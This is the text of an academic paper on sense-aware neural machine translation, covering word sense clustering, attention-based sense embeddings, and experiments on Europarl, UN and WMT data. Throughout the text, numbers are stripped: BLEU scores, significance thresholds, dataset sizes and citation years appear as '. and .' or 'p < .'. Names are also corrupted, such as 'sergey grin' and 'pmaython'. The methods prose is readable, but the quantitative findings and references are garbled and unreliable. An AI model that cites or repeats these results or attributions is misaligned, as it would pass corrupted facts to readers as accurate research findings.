random walks. finally, we also consider for comparison a wsd method based on random walks on the wordnet knowledge graph (agirre and soroa, ; agirre et al., ), available from the ukb toolkit (ixa .si.ehu.es/ukb); strictly speaking, this is the only genuine wsd method, as the two previous ones pertain to sense induction rather than disambiguation, but for simplicity we will refer to all of them as wsd. in the graph, senses correspond to nodes and the relationships or dependencies between pairs of senses correspond to the edges between those nodes. from each input sentence, we extract its content words (nouns, verbs, adjectives, and adverbs) that have an entry in the wordnet weighted graph. the method calculates the probability of a random walk over the graph from a target word's sense ending on any other sense in the graph, and determines the sense with the highest probability for each analyzed word. in this case, the random walk algorithm is pagerank (grin and page, ), which computes a relative structural importance or "rank" for each node.
integration with neural mt

baseline neural mt model

we now present several models integrating wsd into nmt, starting from an attention-based nmt baseline (bahdanau et al., ; luong et al., ). given a source sentence x with words wx, $x = (w^x_1, w^x_2, \ldots, w^x_t)$, the model computes a conditional distribution over translations, expressed as $p(y = (w^y_1, w^y_2, \ldots, w^y_{t'}) \mid x)$. the neural network model consists of an encoder, a decoder, and an attention mechanism. first, each source word $w^x_t \in v$ is projected from a one-hot word vector into a continuous vector space representation xt. then, the resulting sequence of word vectors is read by the bidirectional encoder, which consists of forward and backward recurrent networks (rnns). the forward rnn reads the sequence in left-to-right order, i.e., $\overrightarrow{h}_t = \overrightarrow{\phi}(\overrightarrow{h}_{t-1}, x_t)$, and the backward rnn reads it right-to-left, $\overleftarrow{h}_t = \overleftarrow{\phi}(\overleftarrow{h}_{t+1}, x_t)$.

the hidden states from the forward and backward rnns are concatenated at each time step t to form an "annotation" vector $h_t = [\overrightarrow{h}_t; \overleftarrow{h}_t]$. taken over several time steps, these vectors form the "context", that is, a tuple of annotation vectors $c = (h_1, h_2, \ldots, h_t)$. the recurrent activation functions $\overrightarrow{\phi}$ and $\overleftarrow{\phi}$ are either long short-term memory units (lstm) or gated recurrent units (gru).

the decoder rnn maintains an internal hidden state $z_{t'}$. after each time step t′, it first uses the attention mechanism to weight the annotation vectors in the context tuple c. the attention mechanism takes as input the previous hidden state of the decoder and one of the annotation vectors, and returns a relevance score $e_{t',t} = f_{att}(z_{t'-1}, h_t)$. these scores are normalized to obtain attention scores:

$\alpha_{t',t} = \exp(e_{t',t}) \Big/ \sum_{k=1}^{t} \exp(e_{t',k})$

these scores serve to compute a weighted sum of annotation vectors $c_{t'} = \sum_{t=1}^{t} \alpha_{t',t}\, h_t$, which are used by the decoder to update its hidden state:

$z_{t'} = \phi_z(z_{t'-1}, y_{t'-1}, c_{t'})$

similarly to the encoder, $\phi_z$ is implemented as either an lstm or gru, and $y_{t'-1}$ is the target-side word embedding vector corresponding to word wy.

sense-aware neural mt models

to model word senses for nmt, we concatenate the embedding of each token with a vector representation of its sense, either obtained from one of the clustering methods presented in § , or learned during encoding, as we will explain. in other words, the new vector w′i representing each source token wi consists of two parts: w′i = [wi ; µi], where wi is the word embedding learned by the nmt, and µi is the sense embedding obtained from wsd or learned by the nmt. to represent these senses, we create two dictionaries, one for words and the other one for sense labels, which will be embedded in a low-dimensional space, before the encoder. we propose several models for using and/or generating sense embeddings for nmt, named and defined as follows.

top sense (top). in this model, we directly use the sense selected for each token by one of the wsd systems above, and use the embeddings of the respective sense as generated by nmt after training.

weighted average of senses (avg). instead of fully trusting the decision of a wsd system (even one adapted to mt), we consider all listed senses and the respective cluster centroids learned by the wsd system. then we convert the distances dl between the input token vector and the centroid of each sense sl into a normalized weight distribution, either by a linear or a logistic normalization:

$\omega_j = 1 - \frac{d_j}{\sum_{1 \le l \le k} d_l} \qquad \text{or} \qquad \omega_j = \frac{e^{-d_j}}{\sum_{1 \le l \le k} e^{-d_l}}$

where k is the total number of senses of token wi. the sense embedding for each token is computed as the weighted average of all sense embeddings:

$\mu_i = \sum_{1 \le j \le k} \omega_j\, \mu_{ij}$
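a small sketch of the avg combination is given below (python; the distances are cosine distances between a token's context vector and the sense centroids from the clustering step, the sense embeddings are plain numpy vectors standing in for nmt parameters, and the linear variant implemented here is an assumption about the intended linear normalization):

```python
import numpy as np

def avg_sense_embedding(dists, sense_embs, logistic=True):
    """weighted average of sense embeddings for one token.
    dists      : distances d_j to each of the k sense centroids
    sense_embs : k x dim matrix of sense embeddings
    logistic   : use the softmax-style normalization; otherwise the linear one."""
    d = np.asarray(dists, dtype=float)
    if logistic:
        w = np.exp(-d) / np.exp(-d).sum()
    else:
        w = 1.0 - d / d.sum()          # assumed form of the linear normalization
    return w @ np.asarray(sense_embs)  # mu_i = sum_j w_j * mu_ij

# the encoder input for the token would then be the concatenation [word_emb ; mu_i]
mu = avg_sense_embedding([0.2, 0.7, 0.9], np.eye(3))
print(mu)
```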
attention-based sense weights (att). instead of obtaining the weight distribution from the centroids computed by wsd, we also propose to dynamically compute the probability of relatedness to each sense based on the current word and sense embeddings during encoding, as follows. given a token wi, we consider all the other tokens in the sentence $(w_1, \ldots, w_{i-1}, w_{i+1}, \ldots, w_l)$ as the context of wi, where l is the length of the sentence. we define the context vector of wi as the mean of all the embeddings uj of the words wj, that is, $u_i = \big(\sum_{l \neq i} u_l\big) / (l - 1)$. then, we compute the similarity f(ui, µij) between each sense embedding µij and the context vector ui using an additional attention layer in the network, with two possibilities that will be compared empirically:

$f(u_i, \mu_{ij}) = \upsilon^{\mathsf{t}} \tanh(w u_i + u \mu_{ij}) \qquad \text{or} \qquad f(u_i, \mu_{ij}) = u_i^{\mathsf{t}} w \mu_{ij}$

the weights ωj are now obtained through the following softmax normalization:

$\omega_j = \frac{e^{f(u_i, \mu_{ij})}}{\sum_{1 \le l \le k} e^{f(u_i, \mu_{il})}}$

finally, the average sense embedding is obtained as in equation ( ), and is concatenated to the word vector ui.

att model with initialization of embeddings (attini). the fourth model is similar to the att model, with the difference that we initialize the embeddings of the source word dictionary using the word2vec vectors of the word types, and the embeddings of the sense dictionary using the centroid vectors obtained from k-means.

table : size of the data sets used for machine translation from english to five different target languages (tl): fr = french, de = german, es = spanish, zh = chinese, nl = dutch. for each pair the table lists the numbers of sentences in the training, development and test sets, and the numbers of sense labels, ambiguous word forms, nouns and verbs.

data, metrics, and implementation

data sets. we train and test our sense-aware mt systems on the data shown in table : the un corpus (rafalovitch and dale, ; www.uncorpora.org) and the europarl corpus (koehn, ; www.statmt.org/europarl). we first experiment with our models using the same data set and protocol as in our previous work (pu et al., ), to enable comparisons with phrase-based statistical mt systems, for which the sense of each ambiguous source word was modeled as a factor. moreover, in order to make a better comparison with other related approaches, we train and test our sense-aware nmt models on large data sets from the workshop on statistical machine translation (wmt) shared tasks over three language pairs (en/de, en/es, and en/fr).

the data set used in our previous work consists of k parallel sentences for each language pair, k for development and k for testing. the data originates from un for en/zh, and from europarl for the other pairs. the source sides of these sets contain around , different english word forms (after lemmatization) that have more than one sense in wordnet. our wsd system generates ca. . k different noun labels and . k verb labels for these word forms.

the wmt data sets additionally used in this paper are the following ones. first, we use the complete en/de set from wmt (bojar et al., ) with a total of ca. . m sentence pairs. in this case, the development set is newstest , and the testing set is made of newstest and . second, for en/fr and en/es, we use data from wmt (bojar et al., ) with . m sentences for en/fr and . m sentences for en/es; we selected the data from different years of wmt because the en/fr and en/es pairs were only available in wmt . here, the development sets are newstest and , and the testing sets are newstest and for both language pairs.
the source sides of these larger additional sets contain around , unique english word forms with more than one sense in wordnet, and our system generates ca. k different noun labels and . k verb labels for each set.

finally, for comparison purposes and model selection, we use the wit corpus (cettolo et al., ; wit .fbk.eu), a collection of transcripts of ted talks. we use k sentence pairs for training, k for development and k for testing.

pre-processing. before assigning sense labels, we tokenize all the texts and identify the parts of speech using the stanford pos tagger (nlp.stanford.edu/software). then, we filter out the stopwords and the nouns that are proper names according to the stanford named entity recognizer. furthermore, we convert the plural forms of nouns to their singular forms and the verb forms to infinitives using the stemmer and lemmatizer from nltk (www.nltk.org), which is essential because wordnet has description entries only for base forms. the pre-processed text is used for assigning sense labels to each occurrence of a noun or verb that has more than one sense in wordnet.

k-means settings. unless otherwise stated, we adopt the following settings in the k-means algorithm, with the implementation provided in scikit-learn (pedregosa et al., ). we use the definition of each sense for initializing the centroids, and later compare this choice with the use of examples. we set kt, the initial number of clusters, to the number of wordnet senses of each ambiguous word type wt, and set the window size for the context surrounding each occurrence to c = .

neural mt. we build upon the attention-based neural translation model (bahdanau et al., ) from the opennmt toolkit (klein et al., ; www.opennmt.net). we use lstm and not gru. for the proposed att and attini models, we add an external attention layer before the encoder, but do not otherwise alter the internals of the nmt model. we set the source and target vocabulary sizes to , and the dimension of word embeddings to , which is recommended for opennmt, so as to reach a strong baseline. for the attini model, because the embeddings from word2vec used for initialization have only dimensions, we randomly pick a vector with dimensions within the range [− . , . ] and concatenate it with the vector from word2vec to reach the required number of dimensions, ensuring a fair comparison. it takes around epochs ( – hours on idiap's gpu cluster) to train each of the five nmt models: the baseline and our four proposals. the avg model takes more time for training (around hours) because we use additional weights and senses for each token. in fact, we limit the number of senses for avg to per word type, after observing that in wordnet there are fewer than words with more than senses.

evaluation metrics. for the evaluation of intrinsic wsd performance, we use the v-score, the f-score, and their average, as used for instance at semeval (manandhar et al., ). the v-score is the weighted harmonic mean of homogeneity and completeness (favoring systems generating more clusters than the reference), and the f-score measures the classification performance (favoring systems generating fewer clusters). therefore, the ranking metric for semeval is the average of the two.

we select the optimal model configuration based on mt performance on development sets, as measured with the traditional multi-bleu score (papineni et al., ). moreover, to estimate the impact of wsd on mt, we also measure the actual impact on the nouns and verbs that have several wordnet senses, by counting how many of them are translated exactly as in the reference translation. to quantify the difference with the baseline, we use the following coefficient. first, for a certain set of tokens in the source data, we note as nimproved the number of tokens that are translated by our system with the same token as in the reference translation, but are translated differently by the baseline system. conversely, we note as ndegraded the number of tokens that are translated by the baseline system as in the reference, but differently by our system. the values of nimproved and ndegraded are obtained using automatic word alignment; they do not capture, of course, the intrinsic correctness of a candidate translation, but only its identity or not with one reference translation. we use the normalized coefficient $\rho = (n_{improved} - n_{degraded}) / t$, where t is the total number of tokens, as a metric to specifically evaluate the translation of words submitted to wsd.

for all tables we mark in bold the best score per condition. for mt scores in tables , , and , we show the improvement over the baseline and its significance based on two confidence levels: either p < . (indicated with a '†') or p < . ('‡'). any p-values larger than . are treated as not significant and are left unmarked.

optimal values of the parameters

best wsd method based on bleu

we first select the optimal clustering method and its initialization settings, in a series of experiments with statistical mt over the wit corpus, extending and confirming our previous results (pu et al., ). in table , we present the bleu and ρ scores of our previous wsd+smt system for the three clustering methods, initialized with vectors either from the wordnet definitions or from examples, for two language pairs. we also provide bleu scores of baseline systems and of oracle ones (i.e., using correct senses as factors). the best method is k-means and the best initialization is with the vectors of definitions. all values of ρ show improvements over the baseline, with up to % for k-means on de/en.

moreover, we found that random initializations underperform with respect to definitions or examples. for a fair comparison, we set the number of clusters equal either to the number of synsets with definitions or with examples, for each word type, and obtained bleu scores on en/zh of . and . , respectively—hence lower than . and . in table . we investigated earlier (pu et al., ) the effect of the context window surrounding each ambiguous token, and found with the wsd+smt factored system on en/zh wit data that the optimal size was , which we use here as well.

table : performance of the wsd+smt factored system for two language pairs from wit , with three clustering methods (graph, crp, k-means) and two initializations (definitions or examples); for en/zh and en/de, the table reports baseline, graph, crp, k-means and oracle bleu scores, together with the ρ (%) values of graph, crp and k-means.
best wsd method based on v/f scores

table shows our wsd results in terms of v-score and f-score, comparing our methods (six lines at the bottom) with other significant systems that participated in the semeval shared task (manandhar et al., ); we provide comparisons with more systems from semeval in our previous paper (pu et al., ). the adaptive k-means initialized with definitions has the highest average score and ranks among the top systems for most of the metrics individually. moreover, the adaptive k-means method finds on average . senses per word type, which is very close to the ground-truth value of . . overall, we observed that k-means infers fewer senses per word type than wordnet. these results show that k-means wsd is effective and provides competitive performance against other weakly supervised alternatives (crp or random walk) and even against semeval wsd methods, but using additional knowledge not available to semeval participants.

table : wsd results from three semeval systems and our six systems, in terms of v-score, f-score, and their average (each reported for all words, for nouns, and for verbs), together with c, the average number of clusters. the adaptive k-means using definitions outperforms the others on the average of v and f, when considering both nouns and verbs, or nouns only. the semeval systems are uoy (korkontzelos and manandhar, ), kcdc-gd (kern et al., ), and duluth-mix-gap (pedersen, ); our systems are k-means, crp and graph, each initialized with definitions or with examples.

selection of wsd+nmt model

to compare several options of the wsd+nmt systems, we trained and tested them on a subset of en/fr europarl (a smaller data set shortened the training times). the results are shown in table . for the avg model, the logistic normalization in equation ( ) works better than the linear one. for the att model, we compared two different labeling approaches for tokens that do not have multiple senses: either use the same null label for all tokens, or use the word itself as a label for its sense; the second option appeared to be the best. finally, for the attini model, we compared the two options for the attention function in equation ( ), and found that the formula with tanh is the best. in what follows, we use these settings for the avg and att systems.

table : performance of various wsd+nmt configurations on an en/fr subset of europarl, with variations with respect to the baseline; the configurations compared are the baseline, top, avg with linear or logistic normalization in equation ( ), att with a null label or with the word used as label, and attini with either attention function of equation ( ). we select the settings with the best performance for our final experiments in § .

table : bleu scores of our sense-aware smt and nmt systems over five language pairs (en/fr, en/de, en/zh, en/es, en/nl): the smt baseline and its graph, crp and k-means variants, and the nmt baseline with k-means + top, k-means + avg, none + att and k-means + attini; attini is the best one among smt and nmt systems. significance testing is indicated by † for p < . and ‡ for p < . .

results
we first evaluate our sense-aware models with smaller data sets (ca. k lines) for five language pairs with english as source. we evaluate them through both automatic measures and human assessment. later on, we evaluate our sense-aware nmt models with larger wmt data sets to enable a better comparison with other related approaches.

bleu scores. table displays the performance of both sense-aware phrase-based and neural mt systems with the training sets of k lines listed in table on five language pairs. specifically, we compare several approaches that integrate word sense information in smt and nmt. the best hyper-parameters are those found above, for each of the wsd+nmt combination strategies, in particular the k-means method for wsd+smt, and the attini method for wsd+nmt—that is, the attention-based model of senses initialized with the output of k-means clustering.

comparisons with baselines. table shows that our wsd+nmt systems perform consistently better than the baselines, with the largest improvements achieved by nmt on en/fr and en/es. the neural systems outperform the phrase-based statistical ones (pu et al., ), which are shown for comparison in the upper part of the table.

we compare our proposal to the recent system proposed by yang et al. ( ), on the k-line en/fr europarl data set (the differences between their system and ours are listed in § ). we carefully implemented their model by following their paper, since their code is not available. using the sense embeddings of the multi-sense skip-gram model (mssg) (neelakantan et al., ) as they do, and training for six epochs as in their study, our implementation of their model reaches only . bleu points. when increasing the training stage until convergence ( epochs), the best bleu score is . , which is still below our nmt baseline of . . we also found that the initialization of embeddings with mssg brings less than bleu point improvement with respect to random initializations (which scored . over six epochs and . until convergence), while yang et al. found a . – . increase on two different test sets. in order to better understand the difference, we tried several combinations of their model with ours. we obtain a bleu score of . by replacing their mssg sense specification model with our adaptive k-means approach, and a bleu score of . by replacing our context calculation method (averaging word embeddings within one sentence) with their context vector generation method, which is computed from the output of a bi-directional rnn. in the end, the best bleu score on this en/fr data set ( . as shown in table , column , last line) is reached by our system with its best options.

lexical choice. using word alignment, we assess the improvement brought by our systems with respect to the baseline in terms of the number of words—here, wsd-labeled nouns and verbs—that are translated exactly as in the reference translation (modulo alignment errors). these numbers can be arranged in a confusion matrix with four values: the words translated correctly (i.e., as in the reference) by both systems, those translated correctly by one system but incorrectly by the other one, and vice versa, and those translated incorrectly by both.
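as an illustration of this bookkeeping, a small sketch follows (python; the boolean inputs are invented here, whereas in the paper they come from automatic word alignment against the reference translation):

```python
def lexical_choice_report(system_correct, baseline_correct):
    """system_correct[i], baseline_correct[i]: whether token i matches the reference
    translation for our system and for the baseline (decided via word alignment)."""
    both = improved = degraded = neither = 0
    for s, b in zip(system_correct, baseline_correct):
        if s and b:
            both += 1
        elif s:
            improved += 1      # system-correct & baseline-incorrect
        elif b:
            degraded += 1      # baseline-correct & system-incorrect
        else:
            neither += 1
    net = (improved - degraded) / len(system_correct)   # normalized net improvement
    return both, improved, degraded, neither, net

# toy example with six ambiguous tokens
print(lexical_choice_report([True, True, False, True, False, True],
                            [True, False, False, False, True, True]))
```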
table : confusion matrix, with counts of correctly and incorrectly translated tokens, for our wsd+nmt (attini) system and our wsd+smt system against their respective baselines (nmt and smt), over the europarl test data, for the en/fr and en/es language pairs.

table shows the confusion matrix for our sense-aware nmt with the attini model versus the nmt baseline over the europarl test data. the net improvement (i.e., the fraction of words improved by our system minus those degraded: explicitly, improvements are system-correct & baseline-incorrect minus system-incorrect & baseline-correct, and degradations the converse difference) appears to be + . % for en/fr and + . % for en/es. for comparison, we show the results of the wsd+smt system versus the smt baseline in the lower part of table : the improvement is smaller, at + . % for en/fr and + . % for en/es. therefore, the attini nmt model brings higher benefits over the nmt baseline than the wsd+smt factored model, although the nmt baseline is stronger than the smt one (see table ).

human assessment. to compare our systems against baselines, we also consider a human evaluation of the translation of words with multiple senses (nouns or verbs). the goal is to capture more precisely the correct translations that are, however, different from the reference. given the cost of the procedure, one evaluator with good knowledge of en and fr rated the translations of four word types that appear frequently in the test set and have multiple possible senses and translations into french. these words are: deal ( tokens), face ( ), mark ( ), and subject ( ). two translations of deal are exemplified in § . for each occurrence, the evaluator sees the source sentence, the reference translation, and the outputs of the nmt baseline and the attini in random order, so that the system cannot be identified. the two translations of the considered word are rated as good, acceptable, or wrong. we submit only cases in which the two translations differ, to minimize the annotation effort with no impact on the comparison between systems.

figure : human comparison of the en/fr translations of four word types (deal, face, mark, subject). (a) proportion of good (light gray), acceptable (middle gray), and wrong (dark gray) translations per word and system (baseline left, attini right, for each word). (b) proportion of translations in which attini is better (light gray), equal (middle gray), or worse (dark gray) than the baseline.

firstly, figure (a) shows that attini has a higher proportion of good translations, and a lower proportion of wrong ones, for all four words. the largest difference is for subject, where attini has % good translations and the baseline only %; moreover, the baseline has % errors and attini has only %. secondly, figure (b) shows the proportions of tokens, for each type, for which attini was respectively better, equal, or worse than the baseline. again, for each of the four words, there are far more improvements brought by attini than degradations. on average, % of the occurrences are improved and only % are degraded.

results on wmt data sets. to demonstrate that our findings generalize to larger data sets, we report results on three data sets provided by the wmt conference (see § ), namely, for en/de, en/es and en/fr. tables and show the results of our proposed nmt models on these test sets. the results in table confirm that our sense-aware nmt models improve significantly the translation quality also on larger data sets, which permit stronger baselines. comparing these results with the ones from table , we even conclude that our models trained on larger, mixed-domain data sets achieve higher improvements than the models trained on smaller, domain-specific data sets (europarl). this clearly shows that our sense-aware nmt models are beneficial on both narrow and broad domains.

table : bleu scores on the wmt newstest and (nt) test sets for the en/fr and en/es language pairs, comparing the baseline, none + att and k-means + attini systems. significance testing is indicated by † for p < . and ‡ for p < . .

table : bleu scores on english-to-german translation over the wmt newstest (nt) and test sets, comparing the context-dependent model (choi et al., ), the context-aware model (zhang et al., ), the self-attentive model (werlen et al., ), our baseline, none + att and k-means + attini. significance testing is indicated by † for p < . and ‡ for p < . ; the highest score per column is in bold.

finally, we compare our model with several recent nmt models that make use of contextual information, thus sharing a similar overall goal to our study. indeed, the model proposed by choi et al. ( ) attempts to improve nmt by integrating context vectors associated to source words into the generation process during decoding. the model proposed by zhang et al. ( ) is aware of previous attended words on the source side in order to better predict which words will be attended in future. the self-attentive residual decoder designed by werlen et al. ( ) leverages the contextual information from previously translated words on the target side. bleu scores on the english–german pair shown in table demonstrate that our baseline is strong and that our model is competitive with respect to recent models that leverage contextual information in different ways.

related work

word sense disambiguation aims to identify the sense of a word appearing in a given context (agirre and edmonds, ). resolving word sense ambiguities should be useful, in particular, for lexical choice in mt. an initial investigation found that a statistical mt system that makes use of off-the-shelf wsd does not yield significantly better quality translations than an smt system not using it (carpuat and wu, ). however, several studies (cabezas and resnik, ; vickrey et al., ; carpuat and wu, ; chan et al., ) reformulated the task of wsd for smt and showed that integrating the ambiguity information generated from modified wsd improved smt by . – . bleu points compared with baselines.

recently, tang et al. ( ) used only the supersenses from wordnet (coarse-grained semantic labels) for automatic wsd, using maximum entropy classification or sense embeddings learned using word2vec. when combining wsd with smt using a factored model, tang et al. improved bleu scores by . points on average, though with large differences between their three test subsets (it q&a pairs).

although these reformulations of the wsd task proved helpful for smt, they did not determine whether actual source-side senses are helpful or not for end-to-end smt. xiong and zhang ( ) attempted to answer this question by performing self-learned word sense induction instead of using pre-specified word senses as traditional wsd does.
however, they created the risk of discovering sense clusters that do not correspond to the senses of words actually needed for mt. hence, they left open an important question, namely, whether wsd based on semantic resources such as wordnet (fellbaum, ) can be successfully integrated with smt. several studies integrated sense information as features to smt, either obtained from the sense graph provided by wordnet (neale et al., ) or generated from both sides of word dependencies (su et al., ). however, apart from the sense graph, wordnet also provides textual information such as sense definitions and examples, which should be useful for wsd, but were not used in these studies. in previous work (pu et al., ), we used this information to perform sense induction on source-side data using k-means and demonstrated improvement with factored phrase-based smt but not nmt.

neural mt became the state of the art (sutskever et al., ; bahdanau et al., ). instead of working directly at the discrete symbol level as smt, it projects and manipulates the source sequence of discrete symbols in a continuous vector space. however, nmt generates only one embedding for each word type, regardless of its possibly different senses, as analyzed, for example, by hill et al. ( ). several studies proposed efficient nonparametric models for monolingual word sense representation (neelakantan et al., ; li and jurafsky, ; bartunov et al., ; liu et al., ), but left open the question whether sense representations can help neural mt by reducing word ambiguity. recent studies integrate the additional sense assignment with neural mt based on these approaches, either by adding such sense assignments as additional features (rios et al., ) or by merging the context information on both sides of parallel data for encoding and decoding (choi et al., ).

yang et al. ( ) recently proposed to add sense information by using weighted sense embeddings as input to neural mt. the sense labels were generated by a mssg model (neelakantan et al., ), and the context vector used for sense weight generation was computed from the output of a bidirectional rnn. finally, the weighted average sense embeddings were used in place of the word embedding for the nmt encoder. the numerical results given in § show that our options for using sense embeddings outperform yang et al.'s proposal. in fact, their approach even performed worse than the nmt baseline on our en/fr data set. we conclude that adaptive k-means clustering is better than mssg for use in nmt, and that concatenating the word embedding and its sense vector as input for the rnn encoder is better than just using the sense embedding for each token. in terms of efficiency, yang et al. ( ) need an additional bidirectional rnn to generate the context vector for each input token, whereas we compute the context vector by averaging the embeddings of the neighboring tokens. this slows down the training of the encoder by a factor of , which may explain why they only trained their model for six epochs.

conclusion

we presented a neural mt system enhanced with an attention-based method to represent multiple word senses, making use of a larger context to disambiguate words that have various possible translations. we proposed several adaptive context-dependent clustering algorithms for wsd and combined them in several ways with nmt—following our earlier experiments with smt (pu et al., )—and found that they had competitive wsd performance on data from the semeval shared task.
for nmt, the best-performing method used the output of k-means to initialize the sense embed- dings that are learned by our system. in partic- ular, it appeared that learning sense embeddings for nmt is better than using embeddings learned separately by other methods, although such em- beddings may be useful for initialization. our ex- periments with five language pairs showed that our sense-aware nmt systems consistently improve over strong nmt baselines, and that they specifi- cally improve the translation of words with multi- ple senses. in the future, our approach to sense-aware nmt could be extended to other nmt architec- tures such as the transformer network proposed by vaswani et al. ( ). as was the case with the lstm-based architecture studied here, the transformer network does not explicitly model or utilize the sense information of words, and, therefore, we hypothesize that its performance could also be improved by using our sense in- tegration approaches. to encourage further re- search in sense-aware nmt, our code is made available at https://github.com/idiap/ sense_aware_nmt. acknowledgments the authors are grateful for support from the swiss national science foundation through the modern sinergia project on modeling dis- course entities and relations for coherent machine translation, grant no. (www. idiap.ch/project/modern), and from the european union through the summa hori- zon project on scalable understanding of multilingual media, grant no. (www. summa-project.eu). the authors would like to thank the tacl editors and reviewers for their helpful comments and suggestions. https://github.com/idiap/sense_aware_nmt https://github.com/idiap/sense_aware_nmt www.idiap.ch/project/modern www.idiap.ch/project/modern www.summa-project.eu www.summa-project.eu references eneko agirre and philip edmonds. . word sense disambiguation: algorithms and appli- cations. springer-verlag, berlin, germany. eneko agirre, oier lópez de lacalle, and aitor soroa. . random walks for knowledge- based word sense disambiguation. computa- tional linguistics, ( ): – . eneko agirre and aitor soroa. . personaliz- ing pagerank for word sense disambiguation. in proceedings of the th conference of the european chapter of the association for com- putational linguistics (eacl), pages – , athens, greece. dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in pro- ceedings of the international conference on learning representations, san diego, ca, usa. sergey bartunov, dmitry kondrashkin, anton osokin, and dmitry vetrov. . breaking sticks and ambiguities with adaptive skip- gram. in artificial intelligence and statistics, pages – . ondřej bojar, christian buck, christian federmann, barry haddow, philipp koehn, johannes leveling, christof monz, pavel pecina, matt post, herve saint-amand, radu soricut, lucia specia, and aleš tamchyna. . findings of the workshop on statis- tical machine translation. in proceedings of the ninth workshop on statistical machine trans- lation, pages – , baltimore, maryland, usa. ondřej bojar, rajen chatterjee, christian federmann, yvette graham, barry haddow, matthias huck, antonio jimeno yepes, philipp koehn, varvara logacheva, christof monz, matteo negri, aurelie neveol, mariana neves, martin popel, matt post, raphael rubino, carolina scarton, lucia specia, marco turchi, karin verspoor, and marcos zampieri. . findings of the conference on machine translation. 
in pro- ceedings of the first conference on machine translation, pages – , berlin, germany. clara cabezas and philip resnik. . using wsd techniques for lexical selection in sta- tistical machine translation. technical report, dtic document. marine carpuat and dekai wu. . word sense disambiguation vs. statistical machine translation. in proceedings of the rd annual meeting of the association for computational linguistics, pages – , michigan, mi, usa. marine carpuat and dekai wu. . improv- ing statistical machine translation using word sense disambiguation. in proceedings of the joint conference on empirical methods in natural language processing and compu- tational natural language learning (emnlp- conll), pages – , prague, czech republic. mauro cettolo, christian girardi, and marcello federico. . wit : web inventory of transcribed and translated talks. in proceed- ings of the th conference of the european association for machine translation (eamt), pages – , trento, italy. yee seng chan, hwee tou ng, and david chiang. . word sense disambiguation im- proves statistical machine translation. in pro- ceedings of the th annual meeting of the association for computational linguistics, pages – , prague, czech republic. heeyoul choi, kyunghyun cho, and yoshua bengio. . context-dependent word repre- sentation for neural machine translation. com- puter speech & language, : – . christiane fellbaum, editor. . wordnet: an electronic lexical database. the mit press, cambridge, ma, usa. thomas s. ferguson. . a bayesian analysis of some nonparametric problems. the annals of statistics, ( ): – . sergey grin and lawrence page. . the anatomy of a large-scale hypertextual web search engine. computer networks and isdn systems, ( - ): – . felix hill, kyunghyun cho, sébastien jean, and yoshua bengio. . the representational ge- ometry of word meanings acquired by neural machine translation models. machine transla- tion, ( ): – . roman kern, markus muhr, and michael granitzer. . kcdc: word sense induction by us- ing grammatical dependencies and sentence phrase structure. in proceedings of the th in- ternational workshop on semantic evaluation (semeval- ), pages – , los angeles, ca, usa. guillaume klein, yoon kim, yuntian deng, jean senellart, and alexander m. rush. . open- nmt: open-source toolkit for neural machine translation. corr, abs/ . v . philipp koehn. . europarl: a parallel cor- pus for statistical machine translation. in pro- ceedings of mt summit x, pages – , phuket, thailand. ioannis korkontzelos and suresh manandhar. . uoy: graphs of ambiguous vertices for word sense induction and disambiguation. in proceedings of the th international work- shop on semantic evaluation (semeval ), pages – , los angeles, california. jiwei li and dan jurafsky. . do multi-sense embeddings improve natural language under- standing? in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , lisbon, portugal. frederick liu, han lu, and graham neubig. . handling homographs in neural machine trans- lation. corr, abs/ . v . thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in proceedings of the conference on empir- ical methods in natural language processing (emnlp), pages – , lisbon, portugal. james macqueen. . some methods for clas- sification and analysis of multivariate obser- vations. in proceedings of the th berkeley symposium on mathematical statistics and probability, pages – . oakland, ca, usa. 
suresh manandhar, ioannis p. klapaftis, dmitriy dligach, and sameer s. pradhan. . semeval- task : word sense induction and disambiguation. in proceedings of the th international workshop on semantic evaluation (semeval ), pages – , los angeles, ca, usa. tomas mikolov, ilya sutskever, kai chen, greg s corrado, and jeff dean. . distributed representations of words and phrases and their compositionality. in advances in neu- ral information processing systems (nips), pages – . andrea moro and roberto navigli. . semeval- task : multilingual all-words sense disambiguation and entity linking. in proceedings of the th international workshop on semantic evaluation (semeval ), pages – , denver, colorado. association for computational linguistics. steven neale, luıs gomes, eneko agirre, oier lopez de lacalle, and antónio branco. . word sense-aware machine translation: including senses as contextual features for im- proved translation models. in proceedings of the th international conference on lan- guage resources and evaluation (lrec ), pages – , portoroz, slovenia. arvind neelakantan, jeevan shankar, alexandre passos, and andrew mccallum. . efficient non-parametric estimation of multiple embed- dings per word in vector space. in proceedings of the conference on empirical meth- ods in natural language processing (emnlp), pages – , doha, qatar. kishore papineni, salim roukos, todd ward, and wei-jing zhu. . bleu: a method for automatic evaluation of machine transla- tion. in proceedings of the th annual meeting of association for computational linguistics, pages – , philadelphia, usa. ted pedersen. . duluth-wsi: senseclusters applied to the sense induction task of semeval- . in proceedings of the th international work- shop on semantic evaluation (semeval ), pages – , los angeles, ca, usa. fabian pedregosa, gaël varoquaux, alexandre gramfort, vincent michel, bertrand thirion, olivier grisel, mathieu blondel, peter prettenhofer, ron weiss, vincent dubourg, jake vanderplas, alexandre passos, david http://www.aclweb.org/anthology/s - http://www.aclweb.org/anthology/s - cournapeau, matthieu brucher, matthieu perrot, and Édouard duchesnay. . scikit- learn: machine learning in pmaython. journal of machine learning research, : – . xiao pu, nikolaos pappas, and andrei popescu- belis. . sense-aware statistical machine translation using adaptive context-dependent clustering. in proceedings of the second con- ference on machine translation, pages – , copenhagen, denmark. alexandre rafalovitch and robert dale. . united nations general assembly resolutions: a six-language parallel corpus. in proceedings of mt summit xii, pages – , ontario, on. canada. annette rios, laura mascarell, and rico sennrich. . improving word sense dis- ambiguation in neural machine translation with sense embeddings. in second confer- ence on machine translation, pages – , copenhagen, denmark. jinsong su, deyi xiong, shujian huang, xianpei han, and junfeng yao. . graph-based col- lective lexical selection for statistical machine translation. in proceedings of the conference on empirical methods in natural language pro- cessing (emnlp), pages – , lisbon, portugal. ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in advances in neural information processing systems (nips), pages – . haiqing tang, deyi xiong, oier lopez de lacalle, and eneko agirre. . improv- ing translation selection with supersenses. 
